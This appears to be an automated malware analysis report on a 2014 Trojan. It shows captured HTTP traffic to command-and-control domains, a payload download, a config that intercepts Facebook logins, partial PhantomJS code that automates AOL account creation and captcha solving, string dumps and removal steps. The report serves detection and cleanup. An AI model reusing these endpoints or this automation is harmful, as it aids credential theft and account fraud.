GET /index.php?method=dep&noxor&file=phajs.dep&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:15 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
var system=require("system");var fs=require("fs");var workingDir=fs.wo
rkingDirectory;function loadJSON(a){return JSON.parse(fs.read(a))}func
tion argsToMap(){var e={};e.scriptName=system.args[0];for(var b=1;b<
;system.args.length;b  ){var c=system.args[b].split("=");if(c.length==
2){var a=c[0].slice(2);var d=c[1];e[a]=d}}return e}function Settings(b
,a){this.pageSettings={localToRemoteUrlAccessEnabled:true,webSecurityE
nabled:true,XSSAuditingEnabled:true,userAgent:b};this.viewportSize=a;t
his.timeout=120}function Framework(settings,page){var self=this;var lo
adInProgress=false;var watchdog=null;var logFile=null;this.onError=nul
l;this.disableLogging=false;this.system=require("system");if(undefined
===page){this.page=require("webpage").create()}else{this.page=page}for
(var prop in settings.pageSettings){this.page.settings[prop]=settings.
pageSettings[prop]}this.page.viewportSize=settings.viewportSize;this.c
onsoleRead=function(){var line=system.stdin.readLine();return line};th
is.setLogFile=function(file){logFile=file};this.page.onConsoleMessage=
function(arg){self.log(arg)};this.dumpCaptcha=function(elementId,desti
nationPNG,onComplete){var CAPTCHA_MAX_TRIES=20;var TRY=1;function rend
er(){var rect=$.page.evaluate(function(eId){var captchaElem=document.g
etElementById(eId);if(!captchaElem.complete){return null}captchaElem.s
crollIntoView();var bound=captchaElem.getBoundingClientRect();var rect
={left:bound.left document.body.scrollLeft,top:bound.top document.body
.scrollTop,width:bound.width,height:bound.height};return rect},ele
<<< skipped >>>

GET /index.php?method=post&type=captcha_poll&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3c692a04&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:01:02 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver:4|rt:STANDARD|at:SNS|ld:mail.aol.com|uv:AOL|lc:en-us|mt:ANGELIA|snt:ScreenName|sid:cba29550-2828-4767-b16d-6cdc243f65ec&offerId=newmail-en-us-v2&seamless=novl HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: my.screenname.aol.com

HTTP/1.1 302 Moved Temporarily

Date: Sat, 17 May 2014 12:00:18 GMT

Pragma: No-cache

Cache-Control: no-cache,no-store,max-age=0

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Location: hXXps://my.screenname.aol.com/_cqr/login/login.psp?seamless=novl&locale=us&offerId=newmail-en-us-v2&siteState=ver:4|rt:STANDARD|at:SNS|ld:mail.aol.com|uv:AOL|lc:en-us|mt:ANGELIA|snt:ScreenName|sid:cba29550-2828-4767-b16d-6cdc243f65ec&authLev=0&sitedomain=sns.webmail.aol.com&lang=en

Content-Type: text/html;charset=UTF-8

Content-Language: en-US

Content-Length: 0

P3P: CP="PHY ONL PRE STA CURi OUR IND"

Keep-Alive: timeout=15, max=223

Connection: Keep-Alive

GET /dep/zip.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:06 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Sat, 22 Oct 2011 00:30:24 GMT

Accept-Ranges: bytes

Content-Length: 290816

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........::..[TM.[TM
.[TM.GXM.[TM.}_M.[TM.GZM.[TM.DGM.[TM.[UM.[TM.}^MJ[TM_]RM.[TMRich.[TM..
..............PE..L.....xH................. [email protected]....@.
.........................p............................................
..XH..P....`.. .......................................................
.....................0...............................text............ 
.................. ..`.rdata..."...0...0...0..............@[email protected]...
.....`.......`[email protected]... ....`.......`..............@.
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /index.php?method=all&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:45 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.132."southblood.net" "tablefruit.net" "groupcook.net" 
"signarmy.net" "watchstand.net" "saltsecond.net" "wifeknew.net" "lasop
eidres.com" var_user_ip.574.%invite_cc% = "1";.ºn_contact% = "1";.%l
ive_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=db0e2
494148fecef9876b7a73b18b2ca&talk=1";.ëaylive% = "partyorderly.net";.
%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/"
 "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/
" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_pa
ssword% = "0";.%timer% = "1200";.%state% = "BU";.%cpuinfo% = "Intel(R)
 Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)";.%relay_soxid% = "3c692a04";.
%ip% = "79.176.13.160";.%port% = "31285";..............

GET / HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: mail.aol.com

HTTP/1.1 302 Found

Date: Sat, 17 May 2014 12:00:18 GMT

Cache-Control: private

Content-Type: text/html; charset=utf-8

Location: hXXp://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver:4|rt:STANDARD|at:SNS|ld:mail.aol.com|uv:AOL|lc:en-us|mt:ANGELIA|snt:ScreenName|sid:cba29550-2828-4767-b16d-6cdc243f65ec&offerId=newmail-en-us-v2&seamless=novl

P3P: CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR"

X-Powered-By: ASP.NET

Content-Length: 456

Set-Cookie: L7Id=30923; domain=.mail.aol.com; path=/

Set-Cookie: L7Id=30923; domain=.mail.aol.com; path=/

Set-Cookie: Context=ver:3&sid:cba29550-2828-4767-b16d-6cdc243f65ec&rt:STANDARD&i:f&ckd:.mail.aol.com&ckp:/&ha:16ugcbeDto1GbXpmN4X4AHmGDwQ=&; domain=.mail.aol.com; path=/; HttpOnly

Keep-Alive: timeout=120

Connection: Keep-Alive
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://my.sc
reenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&a
mp;lang=en&locale=us&authLev=0&siteState=ver:4|rt:ST
ANDARD|at:SNS|ld:mail.aol.com|uv:AOL|lc:en-us|mt:A
NGELIA|snt:ScreenName|sid:cba29550-2828-4767-b16d-6cdc243f65ec
&offerId=newmail-en-us-v2&seamless=novl">here</a>.<
;/h2>..</body></html>..HTTP/1.1 302 Found..Date: Sat, 1
7 May 2014 12:00:18 GMT..Cache-Control: private..Content-Type: text/ht
ml; charset=utf-8..Location: hXXp://my.screenname.aol.com/_cqr/login/l
ogin.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&si
teState=ver:4|rt:STANDARD|at:SNS|ld:mail.aol.com|uv:
AOL|lc:en-us|mt:ANGELIA|snt:ScreenName|sid:cba29550-28
28-4767-b16d-6cdc243f65ec&offerId=newmail-en-us-v2&seamless=novl..P3P:
 CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR"..X-Powered-B
y: ASP.NET..Content-Length: 456..Set-Cookie: L7Id=30923; domain=.mail.
aol.com; path=/..Set-Cookie: L7Id=30923; domain=.mail.aol.com; path=/.
.Set-Cookie: Context=ver:3&sid:cba29550-2828-4767-b16d-6cdc243f65ec&rt
:STANDARD&i:f&ckd:.mail.aol.com&ckp:/&ha:16ugcbeDto1GbXpmN4X4AHmGDwQ
=&; domain=.mail.aol.com; path=/; HttpOnly..Keep-Alive: timeout=120.
.Connection: Keep-Alive..<html><head><title>Object m
oved</title></head><body>..<h2>Object move
<<< skipped >>>

GET /index.php?method=validate&mode=sox&v=029&sox=3ba09e01 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:06 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
304..szS........tablefruit.net.........>...H...dS.j...g.).@..,s.*..
.p...E..........a8..........f.`.r..N.4.l...'....y...s......=5._g.3....
.x.....7O..(o....CN...Y..J...kfn,.....g.)..H..lN^.........a..#...YV .b
..It$...P1&..m0.L...n~..-.B.N...hf...\..a....;..]...G.......M..io.h...
e...=...J..Ie..%....XR.. ${./m.NL.......B..r..0........z.-.h..l.S...($
.EypMj..|...U)E....y<....{g.1.w...O.(....2..[.....m.l......3*.KqV.F
...v(.....b...E?....X1w ..*.W. .f9.N..K(....-x..G....R./..m....q.~...9
5&......c........3....1.<v...@~. ..?.0..T{.WN.....5.M.<.....;9..
.b...oc~#.2...\:....P..;..Q...R.Ww..R5l.G......AZ..}...R.}....g..[&.J.
..L.sb4.s...J,4|...W...r9...g2.......&d...,.j]J.........@o.$!.@.....@Z
a......9.e........9.C.I.Cm..d..*$.QK)....].......Ce......D......i.R.~.
..r.......6](y.)m..K..,.9...U&...Q2.H*.&(.H'..f.vo.(...........c.x.p&g
t;...._7..d..J?{E0\....of.e.=m.m...>Yo.......sr.6U.y.O.{T..|Vc.i.;X
.w....U;.e....%#.o0..\..j*...c;sd&...R...l........-.>..0.]....M,...
...E7..;n.?E.. Z.^......>.3Ym.K..CA#.O.'.......:......\F..Q [o...Q.
.W.l..f.&.Pf....n...=.(.j4....P..2......=q..dR..[..![...b.85W8KR.l..9-
.....2...N/...m0.:.....;~. h&..St.Us..`.e...!.4..

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

PSSSSSSh

D$(SSh

N.aVu

9}[%f

T$ SSSh

SSShpqC

t.SSSh

u,SSSh

SSSh`

t%SSShp

SSSh0

~!SSShp

.Yhu$

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

AWS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

[Exeunt RATCLIFF and the other Attendants]

Be executed in his father's sight.

[Exeunt all but RICHMOND]

Ere I let fall the windows of mine eyes:

bvlwninlaq.exe

ck.exe

Engine Manager TCP/IP Topology

ausksswsax.exe

And see our pleasure herein executed.

No object but her passion's strength renews;

[Exit PORTIA]

[Exeunt]

.QvhiL

Take my deserts to his, and join 'em both:

He shall be executed presently.

[Exeunt Senators]

.vr6x

*&.QV

bell-wether; next, to be compassed, like a good

pass for a wise man: for what says Quinapalus?

Your looks are pale and wild, and do import

And in our sports my better cunning faints

Is my report to his great worthiness.

Peaseblossom! Cobweb! Moth! and Mustardseed!

The Lady Anne pass from her coronation?

He is a dreamer; let us leave him: pass.

[Sennet. Exeunt all except BRUTUS and CASSIUS]

Merely upon myself. Vexed I am

Of late with passions of some difference,

.YSO6

[Exeunt OLIVIA and MARIA]

'be opposite with a kinsman, surly with servants;

[Flourish. Exeunt KING RICHARD II and train]

Give but that portion which yourself proposed,

I with the morning's love have oft made sport,

[Exeunt KING LEAR, KENT, and Attendants]

That opportunity

The abuse of greatness is, when it disjoins

[Exeunt DESDEMONA and EMILIA]

[Exeunt CORIN and TOUCHSTONE]

Catching all passions in his craft of will:

Of young, of old; and sexes both enchanted,

PORTIA

it comes to pass oft that a terrible oath, with a

word of mouth; set upon Aguecheek a notable report

But I will wed thee in another key,

[Exeunt MARIA and Attendants]

They shall have none, I swear, but these my joints;

Whose execution takes your enemy off,

The king's physician: as he pass'd along,

Pray heaven, he sound not my disgrace! For certain,

'Mong boys, grooms, and lackeys. But their pleasures

X%f:u

Shalt have thy trespass cited up in rhymes,

&F.llo, hie you home,

[Exeunt TRANIO, Pedant, and BAPTISTA]

[Exeunt ISABELLA, LUCIO, and Provost]

[Exeunt LUCILIUS and TITINIUS]

No man bears sorrow better. Portia is dead.

Ha! Portia!

O insupportable and touching loss!

Portia, art thou gone?

Her two blue windows faintly she up-heaveth,

'Tis certain, every man that dies ill, the ill upon

'Tis like a pardon after execution:

en I was certain o'er incertainty,

Within his bending sickle's compass come:

Whose father then, as men report

[Exeunt SHALLOW, SLENDER, PAGE, and Host]

[Exeunt all but LAFEU and PAROLLES]

[Exeunt Guard]

Of what hath come to pass: for when she saw--

[Exeunt, bearing MARK ANTONY]

Proportion'd to our cause, must be as great

Pass away frowning.

Door-keeper of the Council-chamber. Porter, (Porter:)

The play may pass, if they be still and willing,

[Flourish. Exeunt all but KING OF FRANCE, GONERIL,

[Exeunt KING OF FRANCE and CORDELIA]

And part in just proportion our small strength.

[Exeunt QUEEN and Ladies]

m:\1d

Well, let that pass. Dorset is fled to Richmond.

[Exeunt PISTOL, and French Soldier]

adventurously. I must stay with the lackeys, with

[Exeunt Servants with the basket]

dream. Here, here, here be my keys: ascend my

sport anon: follow me, gentlemen.

The elephant hath joints, but none for courtesy:

If any thing more than your sport and pleasure

[Exeunt MERCUTIO and BENVOLIO]

Now, afore God, I am so vexed, that every part about

[Exeunt DUKE VINCENTIO and Provost]

Enforced us to this execution?

All my reports go with the modest truth;

The execution of my big-swoln heart

Then, executioner, unsheathe thy sword:

V%SQDA

h{.hw

].Qw>^

[Exeunt Duke and his train]

I would not take this from report; it is,

Report of fashions in proud Italy,

[Exeunt TROILUS and CRESSIDA]

It doth import him much to speak with me.

[Exeunt all but MONTAGUE, LADY MONTAGUE, and BENVOLIO]

Then, churls, their thoughts, although their eyes were kind,

Thou hast pass'd by the ambush of young days,

Certain, men should be what they seem.

Porter

To let the troop pass fairly; or I'll find

other godmother, and Ladies. The troop pass once

For 'tis the sport to have the engineer

[Exeunt severally; HAMLET dragging in POLONIUS]

Madam, 'twas Ariadne passioning

Haste thou the Master Mistris of my passion,

Hazard so dangerous as doth hourly grow

Are mortised and adjoin'd; which, when it falls,

[Exeunt all but KENT and Gentleman]

Most certain, sir.

To the hot passion of distemper'd blood

Upon our joint and several dignities.

cut of a certain courtier's beard: he sent me word,

Then he's a rogue, and a passy measures panyn: I

[Exeunt Clown, FABIAN, SIR TOBY BELCH, and SIR ANDREW]

hangman shall execute it. Come your ways. We'll

And, being intercepted in your sport,

This valley fits the purpose passing well.

VALERIA, &c. passing over the stage,

[A flourish with drums and trumpets. Exeunt]

Of any promise that hath pass'd from him.

I'll tell thee as we pass; but this I pray,

Do execution on my flesh and blood.

Although she lave them hourly in the flood.

And to our sport.

The effect doth operate another way.

[Exeunt severally]

Thy griefs their sports, thy resolution mock'd;

[Exeunt Knights]

Without some pleasure now. What sport tonight?

To weep; whose every passion fully strives

[Exeunt MARK ANTONY and CLEOPATRA with

Could penetrate her uncompassionate sire;

To pass assurance of a dower in marriage

Nothing certainer:

Out of his self-drawing web, he gives us note,

zcÁ

%System%\ausksswsax.exe

|tablefruit.net

WATCHDOGPROC "c:\windows\system32\bvlwninlaq.exe"

%System%\bvlwninlaq.exe

mscoree.dll

KERNEL32.DLL

ausksswsax.exe_5516:

.text

`.rdata

@.data

PSSSSSSh

D$(SSh

N.aVu

9}[%f

T$ SSSh

SSShpqC

t.SSSh

u,SSSh

SSSh`

t%SSShp

SSSh0

~!SSShp

.Yhu$

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

AWS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

[Exeunt RATCLIFF and the other Attendants]

Be executed in his father's sight.

[Exeunt all but RICHMOND]

Ere I let fall the windows of mine eyes:

bvlwninlaq.exe

ck.exe

Engine Manager TCP/IP Topology

ausksswsax.exe

And see our pleasure herein executed.

No object but her passion's strength renews;

[Exit PORTIA]

[Exeunt]

.QvhiL

Take my deserts to his, and join 'em both:

He shall be executed presently.

[Exeunt Senators]

.vr6x

*&.QV

bell-wether; next, to be compassed, like a good

pass for a wise man: for what says Quinapalus?

Your looks are pale and wild, and do import

And in our sports my better cunning faints

Is my report to his great worthiness.

Peaseblossom! Cobweb! Moth! and Mustardseed!

The Lady Anne pass from her coronation?

He is a dreamer; let us leave him: pass.

[Sennet. Exeunt all except BRUTUS and CASSIUS]

Merely upon myself. Vexed I am

Of late with passions of some difference,

.YSO6

[Exeunt OLIVIA and MARIA]

'be opposite with a kinsman, surly with servants;

[Flourish. Exeunt KING RICHARD II and train]

Give but that portion which yourself proposed,

I with the morning's love have oft made sport,

[Exeunt KING LEAR, KENT, and Attendants]

That opportunity

The abuse of greatness is, when it disjoins

[Exeunt DESDEMONA and EMILIA]

[Exeunt CORIN and TOUCHSTONE]

Catching all passions in his craft of will:

Of young, of old; and sexes both enchanted,

PORTIA

it comes to pass oft that a terrible oath, with a

word of mouth; set upon Aguecheek a notable report

But I will wed thee in another key,

[Exeunt MARIA and Attendants]

They shall have none, I swear, but these my joints;

Whose execution takes your enemy off,

The king's physician: as he pass'd along,

Pray heaven, he sound not my disgrace! For certain,

'Mong boys, grooms, and lackeys. But their pleasures

X%f:u

Shalt have thy trespass cited up in rhymes,

&F.llo, hie you home,

[Exeunt TRANIO, Pedant, and BAPTISTA]

[Exeunt ISABELLA, LUCIO, and Provost]

[Exeunt LUCILIUS and TITINIUS]

No man bears sorrow better. Portia is dead.

Ha! Portia!

O insupportable and touching loss!

Portia, art thou gone?

Her two blue windows faintly she up-heaveth,

'Tis certain, every man that dies ill, the ill upon

'Tis like a pardon after execution:

en I was certain o'er incertainty,

Within his bending sickle's compass come:

Whose father then, as men report

[Exeunt SHALLOW, SLENDER, PAGE, and Host]

[Exeunt all but LAFEU and PAROLLES]

[Exeunt Guard]

Of what hath come to pass: for when she saw--

[Exeunt, bearing MARK ANTONY]

Proportion'd to our cause, must be as great

Pass away frowning.

Door-keeper of the Council-chamber. Porter, (Porter:)

The play may pass, if they be still and willing,

[Flourish. Exeunt all but KING OF FRANCE, GONERIL,

[Exeunt KING OF FRANCE and CORDELIA]

And part in just proportion our small strength.

[Exeunt QUEEN and Ladies]

m:\1d

Well, let that pass. Dorset is fled to Richmond.

[Exeunt PISTOL, and French Soldier]

adventurously. I must stay with the lackeys, with

[Exeunt Servants with the basket]

dream. Here, here, here be my keys: ascend my

sport anon: follow me, gentlemen.

The elephant hath joints, but none for courtesy:

If any thing more than your sport and pleasure

[Exeunt MERCUTIO and BENVOLIO]

Now, afore God, I am so vexed, that every part about

[Exeunt DUKE VINCENTIO and Provost]

Enforced us to this execution?

All my reports go with the modest truth;

The execution of my big-swoln heart

Then, executioner, unsheathe thy sword:

V%SQDA

h{.hw

].Qw>^

[Exeunt Duke and his train]

I would not take this from report; it is,

Report of fashions in proud Italy,

[Exeunt TROILUS and CRESSIDA]

It doth import him much to speak with me.

[Exeunt all but MONTAGUE, LADY MONTAGUE, and BENVOLIO]

Then, churls, their thoughts, although their eyes were kind,

Thou hast pass'd by the ambush of young days,

Certain, men should be what they seem.

Porter

To let the troop pass fairly; or I'll find

other godmother, and Ladies. The troop pass once

For 'tis the sport to have the engineer

[Exeunt severally; HAMLET dragging in POLONIUS]

Madam, 'twas Ariadne passioning

Haste thou the Master Mistris of my passion,

Hazard so dangerous as doth hourly grow

Are mortised and adjoin'd; which, when it falls,

[Exeunt all but KENT and Gentleman]

Most certain, sir.

To the hot passion of distemper'd blood

Upon our joint and several dignities.

cut of a certain courtier's beard: he sent me word,

Then he's a rogue, and a passy measures panyn: I

[Exeunt Clown, FABIAN, SIR TOBY BELCH, and SIR ANDREW]

hangman shall execute it. Come your ways. We'll

And, being intercepted in your sport,

This valley fits the purpose passing well.

VALERIA, &c. passing over the stage,

[A flourish with drums and trumpets. Exeunt]

Of any promise that hath pass'd from him.

I'll tell thee as we pass; but this I pray,

Do execution on my flesh and blood.

Although she lave them hourly in the flood.

And to our sport.

The effect doth operate another way.

[Exeunt severally]

Thy griefs their sports, thy resolution mock'd;

[Exeunt Knights]

Without some pleasure now. What sport tonight?

To weep; whose every passion fully strives

[Exeunt MARK ANTONY and CLEOPATRA with

Could penetrate her uncompassionate sire;

To pass assurance of a dower in marriage

Nothing certainer:

Out of his self-drawing web, he gives us note,

zcÁ

%System%\ausksswsax.exe

mscoree.dll

KERNEL32.DLL

stotxqfehklfck.exe_2296:

.text

`.rdata

@.data

PSSSSSSh

D$(SSh

N.aVu

9}[%f

T$ SSSh

SSShpqC

t.SSSh

u,SSSh

SSSh`

t%SSShp

SSSh0

~!SSShp

.Yhu$

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

AWS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

[Exeunt RATCLIFF and the other Attendants]

Be executed in his father's sight.

[Exeunt all but RICHMOND]

Ere I let fall the windows of mine eyes:

bvlwninlaq.exe

ck.exe

Engine Manager TCP/IP Topology

ausksswsax.exe

And see our pleasure herein executed.

No object but her passion's strength renews;

[Exit PORTIA]

[Exeunt]

.QvhiL

Take my deserts to his, and join 'em both:

He shall be executed presently.

[Exeunt Senators]

.vr6x

*&.QV

bell-wether; next, to be compassed, like a good

pass for a wise man: for what says Quinapalus?

Your looks are pale and wild, and do import

And in our sports my better cunning faints

Is my report to his great worthiness.

Peaseblossom! Cobweb! Moth! and Mustardseed!

The Lady Anne pass from her coronation?

He is a dreamer; let us leave him: pass.

[Sennet. Exeunt all except BRUTUS and CASSIUS]

Merely upon myself. Vexed I am

Of late with passions of some difference,

.YSO6

[Exeunt OLIVIA and MARIA]

'be opposite with a kinsman, surly with servants;

[Flourish. Exeunt KING RICHARD II and train]

Give but that portion which yourself proposed,

I with the morning's love have oft made sport,

[Exeunt KING LEAR, KENT, and Attendants]

That opportunity

The abuse of greatness is, when it disjoins

[Exeunt DESDEMONA and EMILIA]

[Exeunt CORIN and TOUCHSTONE]

Catching all passions in his craft of will:

Of young, of old; and sexes both enchanted,

PORTIA

it comes to pass oft that a terrible oath, with a

word of mouth; set upon Aguecheek a notable report

But I will wed thee in another key,

[Exeunt MARIA and Attendants]

They shall have none, I swear, but these my joints;

Whose execution takes your enemy off,

The king's physician: as he pass'd along,

Pray heaven, he sound not my disgrace! For certain,

'Mong boys, grooms, and lackeys. But their pleasures

X%f:u

Shalt have thy trespass cited up in rhymes,

&F.llo, hie you home,

[Exeunt TRANIO, Pedant, and BAPTISTA]

[Exeunt ISABELLA, LUCIO, and Provost]

[Exeunt LUCILIUS and TITINIUS]

No man bears sorrow better. Portia is dead.

Ha! Portia!

O insupportable and touching loss!

Portia, art thou gone?

Her two blue windows faintly she up-heaveth,

'Tis certain, every man that dies ill, the ill upon

'Tis like a pardon after execution:

en I was certain o'er incertainty,

Within his bending sickle's compass come:

Whose father then, as men report

[Exeunt SHALLOW, SLENDER, PAGE, and Host]

[Exeunt all but LAFEU and PAROLLES]

[Exeunt Guard]

Of what hath come to pass: for when she saw--

[Exeunt, bearing MARK ANTONY]

Proportion'd to our cause, must be as great

Pass away frowning.

Door-keeper of the Council-chamber. Porter, (Porter:)

The play may pass, if they be still and willing,

[Flourish. Exeunt all but KING OF FRANCE, GONERIL,

[Exeunt KING OF FRANCE and CORDELIA]

And part in just proportion our small strength.

[Exeunt QUEEN and Ladies]

m:\1d

Well, let that pass. Dorset is fled to Richmond.

[Exeunt PISTOL, and French Soldier]

adventurously. I must stay with the lackeys, with

[Exeunt Servants with the basket]

dream. Here, here, here be my keys: ascend my

sport anon: follow me, gentlemen.

The elephant hath joints, but none for courtesy:

If any thing more than your sport and pleasure

[Exeunt MERCUTIO and BENVOLIO]

Now, afore God, I am so vexed, that every part about

[Exeunt DUKE VINCENTIO and Provost]

Enforced us to this execution?

All my reports go with the modest truth;

The execution of my big-swoln heart

Then, executioner, unsheathe thy sword:

V%SQDA

h{.hw

].Qw>^

[Exeunt Duke and his train]

I would not take this from report; it is,

Report of fashions in proud Italy,

[Exeunt TROILUS and CRESSIDA]

It doth import him much to speak with me.

[Exeunt all but MONTAGUE, LADY MONTAGUE, and BENVOLIO]

Then, churls, their thoughts, although their eyes were kind,

Thou hast pass'd by the ambush of young days,

Certain, men should be what they seem.

Porter

To let the troop pass fairly; or I'll find

other godmother, and Ladies. The troop pass once

For 'tis the sport to have the engineer

[Exeunt severally; HAMLET dragging in POLONIUS]

Madam, 'twas Ariadne passioning

Haste thou the Master Mistris of my passion,

Hazard so dangerous as doth hourly grow

Are mortised and adjoin'd; which, when it falls,

[Exeunt all but KENT and Gentleman]

Most certain, sir.

To the hot passion of distemper'd blood

Upon our joint and several dignities.

cut of a certain courtier's beard: he sent me word,

Then he's a rogue, and a passy measures panyn: I

[Exeunt Clown, FABIAN, SIR TOBY BELCH, and SIR ANDREW]

hangman shall execute it. Come your ways. We'll

And, being intercepted in your sport,

This valley fits the purpose passing well.

VALERIA, &c. passing over the stage,

[A flourish with drums and trumpets. Exeunt]

Of any promise that hath pass'd from him.

I'll tell thee as we pass; but this I pray,

Do execution on my flesh and blood.

Although she lave them hourly in the flood.

And to our sport.

The effect doth operate another way.

[Exeunt severally]

Thy griefs their sports, thy resolution mock'd;

[Exeunt Knights]

Without some pleasure now. What sport tonight?

To weep; whose every passion fully strives

[Exeunt MARK ANTONY and CLEOPATRA with

Could penetrate her uncompassionate sire;

To pass assurance of a dower in marriage

Nothing certainer:

Out of his self-drawing web, he gives us note,

zcÁ

%WinDir%\TEMP\stotxqfehklfck.exe

mscoree.dll

KERNEL32.DLL

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:3488
   stotxqfehklfck.exe:2296
   zip.exe:3828
   bvlwninlaq.exe:2928
   bvlwninlaq.exe:4344
   stotxqfeh9b6cka5dulftj.exe:2036
   ausksswsax.exe:920
   ausksswsax.exe:5516
   stotxqfehc61ck.exe:5288
   stotxqfehx64ck.exe:5324

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\stotxqfeh9b6cka5dulftj.exe (7386 bytes)
   %System%\wistjhoy\tst (10 bytes)
   %System%\wistjhoy\aol\captcha.png (2438 bytes)
   %System%\wistjhoy\aol\account_created (36 bytes)
   %System%\wistjhoy\aol\cookie.txt (4905 bytes)
   %System%\wistjhoy\aol\tmp\zia03828 (5479 bytes)
   %System%\wistjhoy\aol\zip.exe (10500 bytes)
   %System%\wistjhoy\cfg (671 bytes)
   %WinDir%\Temp\stotxqfehc61ck.exe (35 bytes)
   %WinDir%\Temp\stotxqfehklfck.exe (7547 bytes)
   %System%\wistjhoy\por (1 bytes)
   %System%\wistjhoy\aol\phantomjs.exe (183012 bytes)
   %System%\wistjhoy\run (10 bytes)
